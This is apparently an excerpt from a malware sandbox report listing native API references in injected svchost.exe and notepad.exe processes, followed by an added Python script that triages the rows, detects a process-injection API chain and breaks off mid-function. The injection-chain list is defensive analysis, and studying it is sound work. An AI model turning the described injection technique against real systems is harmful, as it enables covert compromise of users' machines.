            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D13D70 NtOpenThread,5_2_04D13D70
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D13D10 NtOpenProcessToken,5_2_04D13D10
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12D00 NtSetInformationFile,5_2_04D12D00
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12EA0 NtAdjustPrivilegesToken,5_2_04D12EA0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12E30 NtWriteVirtualMemory,5_2_04D12E30
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12F90 NtProtectVirtualMemory,5_2_04D12F90
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12FA0 NtQuerySection,5_2_04D12FA0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12F60 NtCreateProcessEx,5_2_04D12F60
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12AB0 NtWaitForSingleObject,5_2_04D12AB0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12B80 NtQueryInformationFile,5_2_04D12B80
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02BA9270 NtDeleteFile,5_2_02BA9270
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02BA9320 NtClose,5_2_02BA9320
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02BA9000 NtCreateFile,5_2_02BA9000
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02BA9170 NtReadFile,5_2_02BA9170
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02BA9480 NtAllocateVirtualMemory,5_2_02BA9480
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004186E32_2_004186E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004020732_2_00402073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168D32_2_004168D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101732_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031C02_2_004031C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1F32_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D0A2_2_00402D0A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D102_2_00402D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042ED832_2_0042ED83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026202_2_00402620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF532_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A8739A2_2_03A8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F02_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B003E62_2_03B003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF132D2_2_03AF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C2_2_03A2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA3522_2_03AFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A02_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C02_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE02742_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4B1B02_2_03A4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B001AA2_2_03B001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF81CC2_2_03AF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A301002_2_03A30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA1182_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7516C2_2_03A7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F1722_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B16B2_2_03B0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC81582_2_03AC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF70E92_2_03AF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF0E02_2_03AFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF0CC2_2_03AEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C02_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF7B02_2_03AFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C02_2_03A3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A407702_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A647502_2_03A64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C6E02_2_03A5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC2_2_03AF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADD5B02_2_03ADD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B005912_2_03B00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A405352_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF75712_2_03AF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEE4F62_2_03AEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF43F2_2_03AFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A314602_2_03A31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF24462_2_03AF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FB802_2_03A5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB5BF02_2_03AB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7DBF92_2_03A7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF6BD72_2_03AF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFB762_2_03AFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFAB402_2_03AFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADDAAC2_2_03ADDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A85AA02_2_03A85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA802_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEDAC62_2_03AEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB3A6C2_2_03AB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFA492_2_03AFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7A462_2_03AF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A02_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0A9A62_2_03B0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A569622_2_03A56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A499502_2_03A49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B9502_2_03A5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A268B82_2_03A268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A438E02_2_03A438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E8F02_2_03A6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD8002_2_03AAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A428402_2_03A42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4A8402_2_03A4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFFB12_2_03AFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41F922_2_03A41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4CFE02_2_03A4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32FC82_2_03A32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A82F282_2_03A82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60F302_2_03A60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFF092_2_03AFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4F402_2_03AB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A49EB02_2_03A49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52E902_2_03A52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFCE932_2_03AFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEEDB2_2_03AFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEE262_2_03AFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40E592_2_03A40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A58DBF2_2_03A58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3ADE02_2_03A3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FDC02_2_03A5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4AD002_2_03A4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7D732_2_03AF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A43D402_2_03A43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF1D5A2_2_03AF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0CB52_2_03AE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30CF22_2_03A30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFCF22_2_03AFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB9C322_2_03AB9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40C002_2_03A40C00
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4_2_055B65AD4_2_055B65AD
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4_2_055AFC2D4_2_055AFC2D
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4_2_055CEA5D4_2_055CEA5D
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4_2_055AFE4D4_2_055AFE4D
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4_2_055ADECD4_2_055ADECD
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D8E4F65_2_04D8E4F6
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D924465_2_04D92446
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CD14605_2_04CD1460
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9F43F5_2_04D9F43F
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04DA05915_2_04DA0591
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D7D5B05_2_04D7D5B0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D975715_2_04D97571
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE05355_2_04CE0535
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D916CC5_2_04D916CC
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CFC6E05_2_04CFC6E0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CDC7C05_2_04CDC7C0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9F7B05_2_04D9F7B0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D047505_2_04D04750
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE07705_2_04CE0770
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE70C05_2_04CE70C0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D8F0CC5_2_04D8F0CC
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D970E95_2_04D970E9
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9F0E05_2_04D9F0E0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D981CC5_2_04D981CC
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04DA01AA5_2_04DA01AA
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CEB1B05_2_04CEB1B0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04DAB16B5_2_04DAB16B
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D1516C5_2_04D1516C
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CCF1725_2_04CCF172
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CD01005_2_04CD0100
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D7A1185_2_04D7A118
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CFB2C05_2_04CFB2C0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D812ED5_2_04D812ED
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE52A05_2_04CE52A0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D802745_2_04D80274
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04DA03E65_2_04DA03E6
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CEE3F05_2_04CEE3F0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D2739A5_2_04D2739A
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CCD34C5_2_04CCD34C
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9A3525_2_04D9A352
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9132D5_2_04D9132D
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9FCF25_2_04D9FCF2
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CD0CF25_2_04CD0CF2
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D80CB55_2_04D80CB5
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE0C005_2_04CE0C00
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D59C325_2_04D59C32
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CFFDC05_2_04CFFDC0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CDADE05_2_04CDADE0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CF8DBF5_2_04CF8DBF
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D91D5A5_2_04D91D5A
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE3D405_2_04CE3D40
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D97D735_2_04D97D73
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CEAD005_2_04CEAD00
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9EEDB5_2_04D9EEDB
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9CE935_2_04D9CE93
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CF2E905_2_04CF2E90
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE9EB05_2_04CE9EB0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE0E595_2_04CE0E59
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9EE265_2_04D9EE26
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CD2FC85_2_04CD2FC8
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CECFE05_2_04CECFE0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE1F925_2_04CE1F92
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9FFB15_2_04D9FFB1
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D54F405_2_04D54F40
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9FF095_2_04D9FF09
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D00F305_2_04D00F30
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D0E8F05_2_04D0E8F0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE38E05_2_04CE38E0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CC68B85_2_04CC68B8
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE28405_2_04CE2840
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CEA8405_2_04CEA840
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE29A05_2_04CE29A0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04DAA9A65_2_04DAA9A6
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CE99505_2_04CE9950
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CFB9505_2_04CFB950
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CF69625_2_04CF6962
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D8DAC65_2_04D8DAC6
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CDEA805_2_04CDEA80
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D25AA05_2_04D25AA0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D7DAAC5_2_04D7DAAC
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9FA495_2_04D9FA49
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D97A465_2_04D97A46
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D53A6C5_2_04D53A6C
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D96BD75_2_04D96BD7
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D1DBF95_2_04D1DBF9
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CFFB805_2_04CFFB80
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9AB405_2_04D9AB40
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D9FB765_2_04D9FB76
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B91C105_2_02B91C10
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B952B05_2_02B952B0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B934A05_2_02B934A0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B8CB205_2_02B8CB20
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02BAB9505_2_02BAB950
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B8ADC05_2_02B8ADC0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B8CD405_2_02B8CD40
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04B8E4675_2_04B8E467
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04B8E7FC5_2_04B8E7FC
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04B8E3465_2_04B8E346
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04B8D8685_2_04B8D868
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04B8CB085_2_04B8CB08
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 6_2_0553DD716_2_0553DD71
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 6_2_0553BDF16_2_0553BDF1
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 6_2_05542C416_2_05542C41
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 6_2_055444D16_2_055444D1
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 6_2_0555C9816_2_0555C981
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 6_2_0553DB516_2_0553DB51
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 6_2_055462E16_2_055462E1
            Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04D4EA12 appears 84 times
            Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04D15130 appears 36 times
            Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04CCB970 appears 266 times
            Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04D27E54 appears 88 times
            Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04D5F290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 268 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 96 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 36 times
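Read side by side, the "Code function" rows for svchost.exe (process 2) and notepad.exe (process 5) above are the same addresses shifted by a constant: every Nt* stub and every heavily called string routine in notepad.exe sits 0x12A0000 above its svchost.exe counterpart, which is what one expects when the same injected image is mapped at a different base in each process. The script below is an added example, not part of the Joe Sandbox report or its tooling. It parses a constructed subset of the rows quoted above, reports which process references the complete injection chain (NtOpenProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtMapViewOfSection, NtQueueApcThread, NtSetContextThread, NtResumeThread, the native calls behind the report's "Writes to foreign memory regions", "Maps a DLL or memory area into another process", "Queues an APC" and "Modifies the context of a thread" signatures), and computes the relocation delta between the two processes. The row grammar, including the function id the table repeats at the end of each row, is inferred from the rows themselves and is an assumption.

```python
"""Triage the flattened 'Code function' rows of a Joe Sandbox report.

Added example, not part of the Joe Sandbox report or its tooling. REPORT_LINES is
a constructed subset of rows copied from this report (process 2 = svchost.exe,
process 5 = notepad.exe); the row grammar is inferred from those rows.
"""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass, field

REPORT_LINES = [
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C753 NtClose,2_2_0042C753",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B60 NtClose,LdrInitializeThunk,2_2_03A72B60",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CF0 NtOpenProcess,2_2_03A72CF0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BF0 NtAllocateVirtualMemory,2_2_03A72BF0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E30 NtWriteVirtualMemory,2_2_03A72E30",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D10 NtMapViewOfSection,2_2_03A72D10",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EE0 NtQueueApcThread,2_2_03A72EE0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74340 NtSetContextThread,2_2_03A74340",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FB0 NtResumeThread,2_2_03A72FB0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004186E32_2_004186E3",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 268 times",
    r"Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12B60 NtClose,LdrInitializeThunk,5_2_04D12B60",
    r"Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12CF0 NtOpenProcess,5_2_04D12CF0",
    r"Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04D12BF0",
    r"Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12E30 NtWriteVirtualMemory,5_2_04D12E30",
    r"Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04D12D10",
    r"Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12EE0 NtQueueApcThread,LdrInitializeThunk,5_2_04D12EE0",
    r"Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D14340 NtSetContextThread,LdrInitializeThunk,5_2_04D14340",
    r"Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04D12FB0 NtResumeThread,LdrInitializeThunk,5_2_04D12FB0",
    r"Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04D4EA12 appears 84 times",
    r"Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 04CCB970 appears 266 times",
]

# Native calls behind the report's "Writes to foreign memory regions", "Maps a DLL or
# memory area into another process", "Queues an APC" and "Modifies the context of a
# thread in another process" signatures.
INJECTION_CHAIN = frozenset({
    "NtOpenProcess", "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
    "NtMapViewOfSection", "NtQueueApcThread", "NtSetContextThread", "NtResumeThread",
})
ROW_RE = re.compile(r"^Source: (?P<src>.+?)Code function: (?P<rest>.+)$")
CODE_RE = re.compile(r"^(?P<pid>\d+)_(?P<stage>\d+)_(?P<addr>[0-9A-Fa-f]{8})\s*(?P<names>.*)$")
STRFN_RE = re.compile(r"^String function: (?P<addr>[0-9A-Fa-f]{8}) appears (?P<n>\d+) times$")


@dataclass
class Process:
    name: str
    apis: dict = field(default_factory=lambda: defaultdict(set))  # api name -> {addresses}
    string_funcs: dict = field(default_factory=dict)              # address -> call-site count


def parse_report(lines):
    """Group rows by process id; string-function rows carry no id and are attached
    afterwards to the process with the same image name."""
    procs, strfn_rows = {}, []
    for line in lines:
        if not (m := ROW_RE.match(line.strip())):
            continue
        exe, rest = m["src"].rsplit("\\", 1)[-1], m["rest"]
        if sf := STRFN_RE.match(rest):
            strfn_rows.append((exe, int(sf["addr"], 16), int(sf["n"])))
        elif cf := CODE_RE.match(rest):
            pid, addr, names = int(cf["pid"]), int(cf["addr"], 16), cf["names"]
            tail = f"{cf['pid']}_{cf['stage']}_{cf['addr']}"  # the table repeats the id
            if names.endswith(tail):
                names = names[: -len(tail)]
            proc = procs.setdefault(pid, Process(exe))
            for name in filter(None, names.split(",")):
                proc.apis[name].add(addr)
    for exe, addr, n in strfn_rows:
        for proc in procs.values():
            if proc.name == exe:
                proc.string_funcs[addr] = n
    return procs


def injection_primitives(proc):
    """Injection-chain native calls referenced by this process' code."""
    return INJECTION_CHAIN & set(proc.apis)


def relocation_delta(a, b):
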